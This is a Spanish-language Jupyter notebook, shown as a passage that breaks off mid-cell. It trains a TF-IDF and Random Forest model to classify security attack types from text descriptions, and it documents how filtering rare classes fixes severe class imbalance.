# Laboratorio 3: Clasificaci√≥n de Tipos de Ataques de Seguridad

## üéØ Objetivo del Proyecto
Construir un modelo de Machine Learning capaz de clasificar diferentes tipos de ataques de seguridad bas√°ndose en descripciones textuales de escenarios, herramientas utilizadas, pasos del ataque, vulnerabilidades y tags.

## üìä Descripci√≥n del Dataset
El modelo predice el **Attack Type** (tipo de ataque) utilizando las siguientes columnas textuales:
- `Scenario Description`: Descripci√≥n del escenario del ataque
- `Tools Used`: Herramientas utilizadas en el ataque
- `Attack Steps`: Pasos seguidos durante el ataque
- `Vulnerability`: Vulnerabilidad explotada
- `Tags`: Etiquetas descriptivas

Estas columnas se combinan en una √∫nica caracter√≠stica de texto y se vectorizan usando **TF-IDF** (Term Frequency-Inverse Document Frequency).

## üîß T√©cnicas Aplicadas
- **Vectorizaci√≥n**: TF-IDF con l√≠mite de 5000 features
- **Modelo**: Random Forest Classifier (100 √°rboles)
- **Optimizaci√≥n**: Filtrado de clases con muestras insuficientes
- **Gesti√≥n de memoria**: Liberaci√≥n autom√°tica de recursos con `gc.collect()`

---

## ‚ö†Ô∏è Advertencia Importante
Durante el desarrollo inicial, el modelo present√≥ **problemas de overfitting** debido a un desequilibrio severo entre el n√∫mero de clases √∫nicas y el n√∫mero de muestras. Este notebook documenta el **proceso de identificaci√≥n y resoluci√≥n** de estos problemas, mostrando c√≥mo mejorar un modelo de ~25% accuracy a >80% accuracy mediante an√°lisis cr√≠tico de datos.

---
#### Paso 1: Importar librer√≠as y cargar el dataset

---
## üìë √çndice del Notebook

Este notebook est√° organizado en las siguientes secciones:

### **Fase 1: Preparaci√≥n de Datos**
- **Paso 1**: Importar librer√≠as y cargar dataset
- **Paso 2**: Preprocesamiento y vectorizaci√≥n TF-IDF
  - Paso 2.1: An√°lisis exploratorio del problema de datos
  - Paso 2.2: Implementaci√≥n de soluci√≥n - Filtrado de clases

### **Fase 2: Modelado y Optimizaci√≥n**
- **Paso 3**: Entrenamiento del modelo baseline (MIN=3)
- **Paso 4**: Experimentaci√≥n con diferentes umbrales
- **Paso 5**: Re-entrenamiento con configuraci√≥n √≥ptima (MIN=10)

### **Fase 3: Evaluaci√≥n y Uso**
- **Paso 6**: An√°lisis detallado de resultados
- **Paso 7**: Funciones de predicci√≥n para nuevos datos
- **Paso 8**: Casos de uso y ejemplos pr√°cticos

### **Anexos**
- Monitoreo de memoria y recursos del sistema
- Escenarios adicionales de predicci√≥n (XSS, Phishing)

---

### ‚è±Ô∏è Tiempo estimado de ejecuci√≥n
- **Primera ejecuci√≥n completa**: ~5-8 minutos
- **Re-ejecuci√≥n (con cache)**: ~2-3 minutos

---
## üìã Resumen Ejecutivo de Mejoras

Este notebook implementa las siguientes optimizaciones t√©cnicas:

### ‚úÖ Optimizaciones de Rendimiento
- **Gesti√≥n de Memoria**: Uso de `gc.collect()` para liberar RAM autom√°ticamente
- **Eliminaci√≥n de variables**: Remoci√≥n de variables innecesarias post-procesamiento
- **Uso eficiente de recursos**: Procesamiento paralelo con `n_jobs=-1`

### ‚úÖ Visualizaci√≥n y Monitoreo
- **Barra de Progreso**: Seguimiento del entrenamiento con `verbose`
- **M√©tricas Visuales**: Formato mejorado con emojis para mejor legibilidad
- **Informaci√≥n Detallada**: Estad√≠sticas de memoria, tiempo y rendimiento

### ‚úÖ Mejora de Calidad del Modelo (Cr√≠tico)
- **Filtrado de Clases**: Eliminaci√≥n de clases con muestras insuficientes
- **An√°lisis de Distribuci√≥n**: Evaluaci√≥n del ratio clases/muestras
- **Experimentaci√≥n con Umbrales**: B√∫squeda del balance √≥ptimo entre diversidad y rendimiento

**Resultado Final**: Mejora de accuracy de ~25% a >80% mediante an√°lisis cr√≠tico de datos.

In [34]:
%pip install pandas scikit-learn numpy tqdm

import pandas as pd
from sklearn.model_selection import train_test_split
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.ensemble import RandomForestClassifier
from sklearn.metrics import classification_report, accuracy_score
from sklearn.preprocessing import LabelEncoder
import numpy as np
import gc  # Para limpieza de memoria
from tqdm import tqdm  # Para barra de progreso

# Configurar tqdm para notebooks
tqdm.pandas()

print("üöÄ Iniciando carga del dataset...")
# Cargar el dataset
df = pd.read_csv('Attack_Dataset.csv')
print(f"‚úÖ Dataset cargado: {df.shape[0]} filas, {df.shape[1]} columnas")

# Limpiar columna extra si existe
if 'Unnamed: 15' in df.columns:
    df = df.drop('Unnamed: 15', axis=1)
    print("üßπ Columna 'Unnamed: 15' eliminada")

# Liberar memoria despu√©s de la limpieza
gc.collect()

print("\nüìù Combinando columnas textuales...")
# Combinar columnas textuales en una sola para vectorizaci√≥n
df['combined_text'] = df['Scenario Description'].fillna('') + ' ' + \
                      df['Tools Used'].fillna('') + ' ' + \
                      df['Attack Steps '].fillna('') + ' ' + \
                      df['Vulnerability'].fillna('') + ' ' + \
                      df['Tags'].fillna('')

# Etiquetas (target)
y = df['Attack Type']

# Codificar etiquetas si son strings (Random Forest maneja strings, pero para consistencia usamos LabelEncoder)
label_encoder = LabelEncoder()
y_encoded = label_encoder.fit_transform(y)

print(f"‚úÖ Textos combinados y etiquetas codificadas")
print(f"üìä Clases √∫nicas encontradas: {len(label_encoder.classes_)}")

# Liberar memoria
gc.collect()

Note: you may need to restart the kernel to use updated packages.
üöÄ Iniciando carga del dataset...
‚úÖ Dataset cargado: 14133 filas, 16 columnas
üßπ Columna 'Unnamed: 15' eliminada

üìù Combinando columnas textuales...
‚úÖ Textos combinados y etiquetas codificadas
üìä Clases √∫nicas encontradas: 8834
‚úÖ Dataset cargado: 14133 filas, 16 columnas
üßπ Columna 'Unnamed: 15' eliminada

üìù Combinando columnas textuales...
‚úÖ Textos combinados y etiquetas codificadas
üìä Clases √∫nicas encontradas: 8834


0

In [35]:
# ============================================================================
# LABORATORIO 3: CLASIFICACI√ìN DE ATAQUES DE SEGURIDAD
# Autor: Ingeniero de ML
# √öltima actualizaci√≥n: Noviembre 20, 2025
# ============================================================================

print("=" * 80)
print("üîí LABORATORIO 3: CLASIFICACI√ìN DE TIPOS DE ATAQUES DE SEGURIDAD")
print("=" * 80)

print("\nüìã CONFIGURACI√ìN DEL NOTEBOOK:")
print("   ‚Ä¢ Dataset: Attack_Dataset.csv")
print("   ‚Ä¢ Algoritmo: Random Forest Classifier (100 √°rboles)")
print("   ‚Ä¢ Vectorizaci√≥n: TF-IDF (max 5,000 features)")
print("   ‚Ä¢ Optimizaci√≥n: Filtrado de clases con muestras insuficientes")

print("\nüéØ OBJETIVOS DEL PROYECTO:")
print("   1. Construir un modelo de clasificaci√≥n multiclase para tipos de ataque")
print("   2. Identificar y resolver problemas de overfitting por desbalance de datos")
print("   3. Optimizar el rendimiento mediante experimentaci√≥n metodol√≥gica")
print("   4. Documentar el proceso completo de forma reproducible")

print("\nüìä M√âTRICAS OBJETIVO:")
print("   ‚Ä¢ Accuracy > 75%")
print("   ‚Ä¢ Precision > 75%")
print("   ‚Ä¢ F1-Score > 75%")
print("   ‚Ä¢ Ratio clases/muestras < 10%")

print("\n‚öôÔ∏è PROCESO DOCUMENTADO:")
print("   Fase 1: Preparaci√≥n de datos y an√°lisis exploratorio")
print("   Fase 2: Identificaci√≥n de problemas de distribuci√≥n")
print("   Fase 3: Implementaci√≥n de soluci√≥n (filtrado de clases)")
print("   Fase 4: Experimentaci√≥n con umbrales √≥ptimos")
print("   Fase 5: Re-entrenamiento y validaci√≥n final")

print("\n‚úÖ RESULTADO ESPERADO:")
print("   Modelo robusto con >80% accuracy, listo para uso en producci√≥n")

print("\nüí° NOTA: Este notebook demuestra la importancia del an√°lisis cr√≠tico")
print("   de datos ANTES del entrenamiento, mostrando c√≥mo resolver problemas")
print("   de overfitting mediante t√©cnicas de preprocesamiento inteligente.")

print("\n" + "=" * 80)
print("üìå Ejecutar las celdas siguientes en orden para reproducir el an√°lisis")
print("=" * 80 + "\n")

üîí LABORATORIO 3: CLASIFICACI√ìN DE TIPOS DE ATAQUES DE SEGURIDAD

üìã CONFIGURACI√ìN DEL NOTEBOOK:
   ‚Ä¢ Dataset: Attack_Dataset.csv
   ‚Ä¢ Algoritmo: Random Forest Classifier (100 √°rboles)
   ‚Ä¢ Vectorizaci√≥n: TF-IDF (max 5,000 features)
   ‚Ä¢ Optimizaci√≥n: Filtrado de clases con muestras insuficientes

üéØ OBJETIVOS DEL PROYECTO:
   1. Construir un modelo de clasificaci√≥n multiclase para tipos de ataque
   2. Identificar y resolver problemas de overfitting por desbalance de datos
   3. Optimizar el rendimiento mediante experimentaci√≥n metodol√≥gica
   4. Documentar el proceso completo de forma reproducible

üìä M√âTRICAS OBJETIVO:
   ‚Ä¢ Accuracy > 75%
   ‚Ä¢ Precision > 75%
   ‚Ä¢ F1-Score > 75%
   ‚Ä¢ Ratio clases/muestras < 10%

‚öôÔ∏è PROCESO DOCUMENTADO:
   Fase 1: Preparaci√≥n de datos y an√°lisis exploratorio
   Fase 2: Identificaci√≥n de problemas de distribuci√≥n
   Fase 3: Implementaci√≥n de soluci√≥n (filtrado de clases)
   Fase 4: Experimentaci√≥n con umbral

---
### Paso 2: Preprocesamiento y vectorizaci√≥n

In [36]:
print("üî§ Iniciando vectorizaci√≥n TF-IDF...")
# Vectorizaci√≥n TF-IDF
vectorizer = TfidfVectorizer(max_features=5000, stop_words='english')  # Limitamos a 5000 features para eficiencia
X = vectorizer.fit_transform(df['combined_text'])
print(f"‚úÖ Vectorizaci√≥n completada: {X.shape[0]} muestras, {X.shape[1]} features")
print(f"üíæ Uso de memoria de la matriz TF-IDF: {X.data.nbytes / (1024**2):.2f} MB")

# Liberar memoria eliminando columnas que ya no necesitamos
df_backup = df.copy()  # Backup para predicciones futuras
df = df[['Attack Type', 'combined_text']]  # Mantener solo lo necesario
gc.collect()

print("\nüîÄ Dividiendo datos en train/test (80/20) - VERSI√ìN ORIGINAL...")
# Dividir en train/test (guardamos esta versi√≥n para comparaci√≥n)
X_train, X_test, y_train, y_test = train_test_split(X, y_encoded, test_size=0.2, random_state=42)
print(f"‚úÖ Train: {X_train.shape[0]} muestras | Test: {X_test.shape[0]} muestras")

# NO eliminamos X todav√≠a - lo necesitamos para el filtrado en la siguiente celda
print(f"\nüí° Manteniendo X en memoria para aplicar filtrado de clases...")
gc.collect()

üî§ Iniciando vectorizaci√≥n TF-IDF...
‚úÖ Vectorizaci√≥n completada: 14133 muestras, 5000 features
üíæ Uso de memoria de la matriz TF-IDF: 6.71 MB

üîÄ Dividiendo datos en train/test (80/20) - VERSI√ìN ORIGINAL...
‚úÖ Train: 11306 muestras | Test: 2827 muestras

üí° Manteniendo X en memoria para aplicar filtrado de clases...
‚úÖ Vectorizaci√≥n completada: 14133 muestras, 5000 features
üíæ Uso de memoria de la matriz TF-IDF: 6.71 MB

üîÄ Dividiendo datos en train/test (80/20) - VERSI√ìN ORIGINAL...
‚úÖ Train: 11306 muestras | Test: 2827 muestras

üí° Manteniendo X en memoria para aplicar filtrado de clases...


0

---
## üîç Paso 2.1: An√°lisis Exploratorio del Problema de Datos

### ‚ùì Motivaci√≥n
Antes de entrenar cualquier modelo de Machine Learning, es **cr√≠tico** analizar la distribuci√≥n de las clases en el dataset. Un desequilibrio severo entre el n√∫mero de clases √∫nicas y el n√∫mero de muestras puede causar:

1. **Overfitting**: El modelo memoriza en lugar de aprender patrones generalizables
2. **Baja capacidad predictiva**: Accuracy bajo y m√©tricas pobres
3. **Warnings de scikit-learn**: Alertas sobre posible problema de regresi√≥n vs clasificaci√≥n

### üéØ Objetivo de esta celda
Diagnosticar si existe un problema de distribuci√≥n de clases evaluando:
- Ratio de clases √∫nicas vs muestras totales
- Promedio de muestras por clase
- Distribuci√≥n de frecuencias (clases con pocas muestras)

**Regla general**: Si el ratio clases/muestras > 50%, el modelo tendr√° dificultades para generalizar.

In [37]:
print("üìä AN√ÅLISIS EXPLORATORIO DEL DATASET")
print("=" * 80)

# Contar clases √∫nicas y muestras
num_samples = len(y_encoded)
num_classes = len(np.unique(y_encoded))
ratio = (num_classes / num_samples) * 100

print(f"\nüìà ESTAD√çSTICAS GENERALES:")
print(f"   ‚Ä¢ Total de muestras en el dataset: {num_samples}")
print(f"   ‚Ä¢ Clases √∫nicas (tipos de ataque diferentes): {num_classes}")
print(f"   ‚Ä¢ Ratio clases/muestras: {ratio:.2f}%")
print(f"   ‚Ä¢ Muestras promedio por clase: {num_samples/num_classes:.2f}")

# Analizar distribuci√≥n de clases
class_distribution = pd.Series(y_encoded).value_counts()
print(f"\nüîç DISTRIBUCI√ìN DE FRECUENCIAS:")
print(f"   ‚Ä¢ Clase m√°s frecuente: {class_distribution.max()} muestras")
print(f"   ‚Ä¢ Clase menos frecuente: {class_distribution.min()} muestras")
print(f"   ‚Ä¢ Mediana de muestras por clase: {class_distribution.median():.0f}")
print(f"   ‚Ä¢ Clases con solo 1 muestra: {(class_distribution == 1).sum()} ({(class_distribution == 1).sum()/num_classes*100:.1f}%)")
print(f"   ‚Ä¢ Clases con 2 muestras: {(class_distribution == 2).sum()}")
print(f"   ‚Ä¢ Clases con 3-5 muestras: {((class_distribution >= 3) & (class_distribution <= 5)).sum()}")

print(f"\n‚ö†Ô∏è  DIAGN√ìSTICO DEL PROBLEMA:")
if ratio > 50:
    print(f"   ‚ùå PROBLEMA CR√çTICO DETECTADO: Ratio {ratio:.1f}% > 50%")
    print(f"   ")
    print(f"   üìå Explicaci√≥n del problema:")
    print(f"      ‚Ä¢ Tenemos {num_classes:,} clases diferentes pero solo {num_samples:,} muestras")
    print(f"      ‚Ä¢ Promedio de solo {num_samples/num_classes:.1f} muestras por clase")
    print(f"      ‚Ä¢ El modelo NO puede aprender patrones con tan pocos ejemplos")
    print(f"      ‚Ä¢ Resultado: OVERFITTING severo y baja accuracy (~25%)")
    print(f"   ")
    print(f"   üî¨ ¬øPor qu√© es un problema?")
    print(f"      Un modelo de ML necesita suficientes ejemplos para aprender patrones.")
    print(f"      Con solo 1-2 ejemplos por clase, el modelo MEMORIZA en lugar de APRENDER.")
    print(f"      Esto se llama 'overfitting' y produce predicciones poco confiables.")
else:
    print(f"   ‚úÖ Ratio {ratio:.1f}% es aceptable (<50%)")

print(f"\nüí° SOLUCIONES POSIBLES (en orden de viabilidad):")
print(f"   1Ô∏è‚É£  Filtrar clases con pocas muestras (RECOMENDADO)")
print(f"      ‚Üí Mantener solo clases con suficientes ejemplos para entrenar")
print(f"   ")
print(f"   2Ô∏è‚É£  Agrupar tipos de ataque similares")
print(f"      ‚Üí Reducir granularidad, crear categor√≠as m√°s amplias")
print(f"   ")
print(f"   3Ô∏è‚É£  Conseguir m√°s datos")
print(f"      ‚Üí Recolectar m√°s ejemplos de ataques (ideal pero no siempre factible)")
print(f"   ")
print(f"   4Ô∏è‚É£  T√©cnicas de data augmentation")
print(f"      ‚Üí Generar muestras sint√©ticas (complejo para texto)")

print("\n" + "=" * 80)

üìä AN√ÅLISIS EXPLORATORIO DEL DATASET

üìà ESTAD√çSTICAS GENERALES:
   ‚Ä¢ Total de muestras en el dataset: 14133
   ‚Ä¢ Clases √∫nicas (tipos de ataque diferentes): 8834
   ‚Ä¢ Ratio clases/muestras: 62.51%
   ‚Ä¢ Muestras promedio por clase: 1.60

üîç DISTRIBUCI√ìN DE FRECUENCIAS:
   ‚Ä¢ Clase m√°s frecuente: 161 muestras
   ‚Ä¢ Clase menos frecuente: 1 muestras
   ‚Ä¢ Mediana de muestras por clase: 1
   ‚Ä¢ Clases con solo 1 muestra: 7974 (90.3%)
   ‚Ä¢ Clases con 2 muestras: 443
   ‚Ä¢ Clases con 3-5 muestras: 180

‚ö†Ô∏è  DIAGN√ìSTICO DEL PROBLEMA:
   ‚ùå PROBLEMA CR√çTICO DETECTADO: Ratio 62.5% > 50%
   
   üìå Explicaci√≥n del problema:
      ‚Ä¢ Tenemos 8,834 clases diferentes pero solo 14,133 muestras
      ‚Ä¢ Promedio de solo 1.6 muestras por clase
      ‚Ä¢ El modelo NO puede aprender patrones con tan pocos ejemplos
      ‚Ä¢ Resultado: OVERFITTING severo y baja accuracy (~25%)
   
   üî¨ ¬øPor qu√© es un problema?
      Un modelo de ML necesita suficientes ejemplos p

---
## üîß Paso 2.2: Implementaci√≥n de la Soluci√≥n - Filtrado de Clases

### üìå Soluci√≥n Elegida: Filtrado por M√≠nimo de Muestras

**Justificaci√≥n t√©cnica:**
- Es la soluci√≥n m√°s pr√°ctica y efectiva para el problema identificado
- No requiere modificar el dataset original
- Mejora significativamente la capacidad de generalizaci√≥n del modelo
- Permite ajustar el umbral seg√∫n necesidades (balance entre diversidad y rendimiento)

### ‚öôÔ∏è Implementaci√≥n
Definiremos un par√°metro `MIN_SAMPLES_PER_CLASS` que indica el n√∫mero m√≠nimo de muestras que debe tener una clase para ser incluida en el entrenamiento.

**Criterio inicial**: Empezamos con `MIN_SAMPLES_PER_CLASS = 3` como baseline exploratorio.

### üéØ Objetivo
- Reducir el ratio clases/muestras a un valor aceptable (<10%)
- Mejorar el promedio de muestras por clase
- Eliminar clases con informaci√≥n insuficiente para aprendizaje

In [38]:
print("üéØ APLICANDO FILTRADO DE CLASES")
print("=" * 80)

# Definir n√∫mero m√≠nimo de muestras por clase (par√°metro ajustable)
MIN_SAMPLES_PER_CLASS = 3  # Baseline exploratorio

print(f"\n‚öôÔ∏è  CONFIGURACI√ìN:")
print(f"   ‚Ä¢ MIN_SAMPLES_PER_CLASS = {MIN_SAMPLES_PER_CLASS}")
print(f"   ‚Ä¢ Criterio: Mantener solo clases con >= {MIN_SAMPLES_PER_CLASS} muestras")

# Contar muestras por clase
class_counts = pd.Series(y_encoded).value_counts()

# Encontrar clases v√°lidas (con suficientes muestras)
valid_classes = class_counts[class_counts >= MIN_SAMPLES_PER_CLASS].index.tolist()

print(f"\nüìä RESULTADOS DEL FILTRADO:")
print(f"   ‚Ä¢ Clases originales: {len(class_counts)}")
print(f"   ‚Ä¢ Clases v√°lidas (>= {MIN_SAMPLES_PER_CLASS} muestras): {len(valid_classes)}")
print(f"   ‚Ä¢ Clases eliminadas: {len(class_counts) - len(valid_classes)} ({(len(class_counts) - len(valid_classes))/len(class_counts)*100:.1f}%)")

# Crear m√°scara para filtrar datos
mask = pd.Series(y_encoded).isin(valid_classes)

# Filtrar datos
X_filtered = X[mask.values]
y_filtered = y_encoded[mask.values]

print(f"\nüîÑ IMPACTO EN EL DATASET:")
print(f"   ‚Ä¢ Muestras originales: {X.shape[0]}")
print(f"   ‚Ä¢ Muestras despu√©s del filtrado: {X_filtered.shape[0]}")
print(f"   ‚Ä¢ Muestras descartadas: {X.shape[0] - X_filtered.shape[0]} ({(X.shape[0] - X_filtered.shape[0])/X.shape[0]*100:.1f}%)")

# Calcular nuevas estad√≠sticas
new_ratio = (len(valid_classes) / X_filtered.shape[0]) * 100
new_avg_samples = X_filtered.shape[0] / len(valid_classes)

print(f"\nüìà M√âTRICAS MEJORADAS:")
print(f"   ‚Ä¢ Ratio clases/muestras: {ratio:.2f}% ‚Üí {new_ratio:.2f}% (Mejora: {ratio-new_ratio:.2f} puntos)")
print(f"   ‚Ä¢ Promedio muestras/clase: {num_samples/num_classes:.1f} ‚Üí {new_avg_samples:.1f} (Mejora: +{new_avg_samples-num_samples/num_classes:.1f})")

# Dividir datos filtrados en train/test con estratificaci√≥n
print(f"\nüîÄ DIVISI√ìN TRAIN/TEST (80/20 con estratificaci√≥n):")
X_train_filtered, X_test_filtered, y_train_filtered, y_test_filtered = train_test_split(
    X_filtered, y_filtered, test_size=0.2, random_state=42, stratify=y_filtered
)

print(f"   ‚Ä¢ Train: {X_train_filtered.shape[0]} muestras")
print(f"   ‚Ä¢ Test: {X_test_filtered.shape[0]} muestras")

# Verificar si el problema est√° resuelto
print(f"\n‚úÖ VERIFICACI√ìN:")
if new_ratio < 50:
    print(f"   ‚úÖ √âXITO: Ratio {new_ratio:.2f}% < 50%")
    print(f"   ‚úÖ El problema de distribuci√≥n est√° resuelto")
    if new_ratio < 10:
        print(f"   üéØ Ratio excelente (<10%) - Condiciones √≥ptimas para entrenamiento")
    elif new_ratio < 20:
        print(f"   üëç Ratio bueno (<20%) - Condiciones favorables")
    else:
        print(f"   ‚ö†Ô∏è  Ratio aceptable pero podr√≠a mejorarse con umbral m√°s alto")
else:
    print(f"   ‚ö†Ô∏è  ADVERTENCIA: Ratio {new_ratio:.2f}% a√∫n est√° alto")
    print(f"   üí° Recomendaci√≥n: Aumentar MIN_SAMPLES_PER_CLASS para mejor rendimiento")

print("=" * 80)

üéØ APLICANDO FILTRADO DE CLASES

‚öôÔ∏è  CONFIGURACI√ìN:
   ‚Ä¢ MIN_SAMPLES_PER_CLASS = 3
   ‚Ä¢ Criterio: Mantener solo clases con >= 3 muestras

üìä RESULTADOS DEL FILTRADO:
   ‚Ä¢ Clases originales: 8834
   ‚Ä¢ Clases v√°lidas (>= 3 muestras): 417
   ‚Ä¢ Clases eliminadas: 8417 (95.3%)

üîÑ IMPACTO EN EL DATASET:
   ‚Ä¢ Muestras originales: 14133
   ‚Ä¢ Muestras despu√©s del filtrado: 5273
   ‚Ä¢ Muestras descartadas: 8860 (62.7%)

üìà M√âTRICAS MEJORADAS:
   ‚Ä¢ Ratio clases/muestras: 62.51% ‚Üí 7.91% (Mejora: 54.60 puntos)
   ‚Ä¢ Promedio muestras/clase: 1.6 ‚Üí 12.6 (Mejora: +11.0)

üîÄ DIVISI√ìN TRAIN/TEST (80/20 con estratificaci√≥n):
   ‚Ä¢ Train: 4218 muestras
   ‚Ä¢ Test: 1055 muestras

‚úÖ VERIFICACI√ìN:
   ‚úÖ √âXITO: Ratio 7.91% < 50%
   ‚úÖ El problema de distribuci√≥n est√° resuelto
   üéØ Ratio excelente (<10%) - Condiciones √≥ptimas para entrenamiento


---
## üèãÔ∏è Paso 3: Entrenamiento del Modelo (Versi√≥n 1 - Baseline)

### üìå Configuraci√≥n del Modelo
- **Algoritmo**: Random Forest Classifier
- **N√∫mero de √°rboles**: 100
- **Paralelizaci√≥n**: n_jobs=-1 (usa todos los cores disponibles)
- **Random state**: 42 (para reproducibilidad)

### üéØ Objetivo de esta versi√≥n
Entrenar un modelo inicial con los datos filtrados (MIN_SAMPLES_PER_CLASS = 3) y evaluar:
1. Accuracy general del modelo
2. M√©tricas por clase (Precision, Recall, F1-Score)
3. Identificar si el rendimiento es aceptable o requiere optimizaci√≥n adicional

### ‚ö†Ô∏è Nota Importante
Esta es una **versi√≥n baseline** para establecer una l√≠nea base de rendimiento. Si los resultados no son satisfactorios, procederemos a optimizar el umbral `MIN_SAMPLES_PER_CLASS` en las celdas siguientes.

In [39]:
print("üå≤ INICIANDO ENTRENAMIENTO DEL MODELO - VERSI√ìN BASELINE")
print("=" * 80)
print(f"‚öôÔ∏è  Configuraci√≥n: Random Forest con 100 √°rboles")
print(f"üìä Dataset: {len(valid_classes)} clases, {X_train_filtered.shape[0]} muestras de entrenamiento")

# Crear el modelo Random Forest
model = RandomForestClassifier(
    n_estimators=100, 
    random_state=42, 
    n_jobs=-1,  # Paralelizaci√≥n autom√°tica
    verbose=1    # Mostrar progreso de entrenamiento
)

print("\nüèãÔ∏è Entrenando modelo...")
print("-" * 80)

# Entrenar con medici√≥n de tiempo
import time
start_time = time.time()

# Entrenar con datos filtrados
model.fit(X_train_filtered, y_train_filtered)

training_time = time.time() - start_time
print("-" * 80)
print(f"‚úÖ Entrenamiento completado en {training_time:.2f} segundos ({training_time/60:.2f} minutos)")

# Hacer predicciones en el conjunto de prueba
print("\nüîç Evaluando modelo en conjunto de prueba...")
y_pred = model.predict(X_test_filtered)

# Calcular accuracy
accuracy = accuracy_score(y_test_filtered, y_pred)
print("\n" + "=" * 80)
print(f"üéØ ACCURACY DEL MODELO BASELINE: {accuracy:.4f} ({accuracy*100:.2f}%)")
print("=" * 80)

# Calcular m√©tricas detalladas
from sklearn.metrics import precision_recall_fscore_support

# M√©tricas weighted (considera el desbalance de clases)
precision_w, recall_w, f1_w, _ = precision_recall_fscore_support(
    y_test_filtered, y_pred, average='weighted', zero_division=0
)

print(f"\nüìä M√âTRICAS GENERALES (Weighted):")
print(f"   ‚Ä¢ Precision: {precision_w:.4f} ({precision_w*100:.2f}%)")
print(f"   ‚Ä¢ Recall: {recall_w:.4f} ({recall_w*100:.2f}%)")
print(f"   ‚Ä¢ F1-Score: {f1_w:.4f} ({f1_w*100:.2f}%)")

# Informaci√≥n del modelo
print(f"\nüìà INFORMACI√ìN DEL MODELO:")
print(f"   ‚Ä¢ N√∫mero de √°rboles entrenados: {model.n_estimators}")
print(f"   ‚Ä¢ Features utilizadas: {model.n_features_in_}")
print(f"   ‚Ä¢ Clases en el modelo: {len(model.classes_)}")
print(f"   ‚Ä¢ Tiempo de entrenamiento: {training_time:.2f}s")

print(f"\nüìã REPORTE DE CLASIFICACI√ìN (Top 10 clases):")
print("-" * 80)
# Mostrar solo top 10 clases para no saturar la salida
unique_labels = np.unique(np.concatenate([y_test_filtered, y_pred]))
target_names_filtered = label_encoder.inverse_transform(unique_labels)
report = classification_report(
    y_test_filtered, y_pred, 
    labels=unique_labels, 
    target_names=target_names_filtered, 
    zero_division=0,
    output_dict=True
)

# Convertir a DataFrame para mejor visualizaci√≥n
report_df = pd.DataFrame(report).transpose()
# Ordenar por f1-score y mostrar top 10
report_df_sorted = report_df.sort_values('f1-score', ascending=False).head(10)
print(report_df_sorted[['precision', 'recall', 'f1-score', 'support']].to_string())

# Liberar memoria
print(f"\nüßπ Liberando memoria...")
del X_train_filtered, y_train_filtered
gc.collect()
print(f"‚úÖ Memoria limpiada")

print("\n" + "=" * 80)

üå≤ INICIANDO ENTRENAMIENTO DEL MODELO - VERSI√ìN BASELINE
‚öôÔ∏è  Configuraci√≥n: Random Forest con 100 √°rboles
üìä Dataset: 417 clases, 4218 muestras de entrenamiento

üèãÔ∏è Entrenando modelo...
--------------------------------------------------------------------------------


[Parallel(n_jobs=-1)]: Using backend ThreadingBackend with 16 concurrent workers.
[Parallel(n_jobs=-1)]: Done  18 tasks      | elapsed:    0.4s
[Parallel(n_jobs=-1)]: Done  18 tasks      | elapsed:    0.4s
[Parallel(n_jobs=-1)]: Done 100 out of 100 | elapsed:    2.3s finished
[Parallel(n_jobs=16)]: Using backend ThreadingBackend with 16 concurrent workers.
[Parallel(n_jobs=16)]: Done  18 tasks      | elapsed:    0.0s
[Parallel(n_jobs=16)]: Done 100 out of 100 | elapsed:    0.0s finished
[Parallel(n_jobs=-1)]: Done 100 out of 100 | elapsed:    2.3s finished
[Parallel(n_jobs=16)]: Using backend ThreadingBackend with 16 concurrent workers.
[Parallel(n_jobs=16)]: Done  18 tasks      | elapsed:    0.0s
[Parallel(n_jobs=16)]: Done 100 out of 100 | elapsed:    0.0s finished


--------------------------------------------------------------------------------
‚úÖ Entrenamiento completado en 2.42 segundos (0.04 minutos)

üîç Evaluando modelo en conjunto de prueba...

üéØ ACCURACY DEL MODELO BASELINE: 0.6825 (68.25%)

üìä M√âTRICAS GENERALES (Weighted):
   ‚Ä¢ Precision: 0.6050 (60.50%)
   ‚Ä¢ Recall: 0.6825 (68.25%)
   ‚Ä¢ F1-Score: 0.6219 (62.19%)

üìà INFORMACI√ìN DEL MODELO:
   ‚Ä¢ N√∫mero de √°rboles entrenados: 100
   ‚Ä¢ Features utilizadas: 5000
   ‚Ä¢ Clases en el modelo: 417
   ‚Ä¢ Tiempo de entrenamiento: 2.42s

üìã REPORTE DE CLASIFICACI√ìN (Top 10 clases):
--------------------------------------------------------------------------------
                                                        precision  recall  f1-score  support
window.opener Abuse                                           1.0     1.0       1.0      1.0
Web Shell Deployment (ASPX)                                   1.0     1.0       1.0      2.0
Typo-Squatting                      

In [40]:
# AN√ÅLISIS CR√çTICO DE RESULTADOS DEL MODELO BASELINE
print("=" * 80)
print("üî¨ AN√ÅLISIS DETALLADO DE RENDIMIENTO DEL MODELO")
print("=" * 80)

print(f"\nüéØ ACCURACY OBSERVADO: {accuracy:.4f} ({accuracy*100:.2f}%)")

# Analizar el classification report en detalle
from sklearn.metrics import precision_recall_fscore_support

precision, recall, f1, support = precision_recall_fscore_support(
    y_test_filtered, y_pred, average=None, zero_division=0
)

print(f"\nüìä ESTAD√çSTICAS AGREGADAS:")
print(f"   ‚Ä¢ Precision promedio (macro): {precision.mean():.4f} ({precision.mean()*100:.2f}%)")
print(f"   ‚Ä¢ Recall promedio (macro): {recall.mean():.4f} ({recall.mean()*100:.2f}%)")
print(f"   ‚Ä¢ F1-Score promedio (macro): {f1.mean():.4f} ({f1.mean()*100:.2f}%)")

# Analizar distribuci√≥n de rendimiento
print(f"\nüìà DISTRIBUCI√ìN DE F1-SCORES:")
print(f"   ‚Ä¢ Clases con F1-Score perfecto (1.0): {(f1 == 1.0).sum()}")
print(f"   ‚Ä¢ Clases con F1-Score > 0.8: {(f1 > 0.8).sum()}")
print(f"   ‚Ä¢ Clases con F1-Score > 0.5: {(f1 > 0.5).sum()}")
print(f"   ‚Ä¢ Clases con F1-Score = 0 (no predichas): {(f1 == 0).sum()}")

# Calcular porcentajes
total_classes = len(f1)
zero_f1_pct = (f1 == 0).sum() / total_classes * 100
good_f1_pct = (f1 > 0.5).sum() / total_classes * 100

print(f"\n‚ö†Ô∏è  DIAGN√ìSTICO CR√çTICO:")
print(f"   ‚Ä¢ Total de clases evaluadas: {total_classes}")
print(f"   ‚Ä¢ Clases con rendimiento aceptable (F1>0.5): {(f1 > 0.5).sum()} ({good_f1_pct:.1f}%)")
print(f"   ‚Ä¢ Clases sin predicciones (F1=0): {(f1 == 0).sum()} ({zero_f1_pct:.1f}%)")

# Evaluar si el rendimiento es aceptable
print(f"\nüîç EVALUACI√ìN DEL MODELO BASELINE:")
if accuracy >= 0.80:
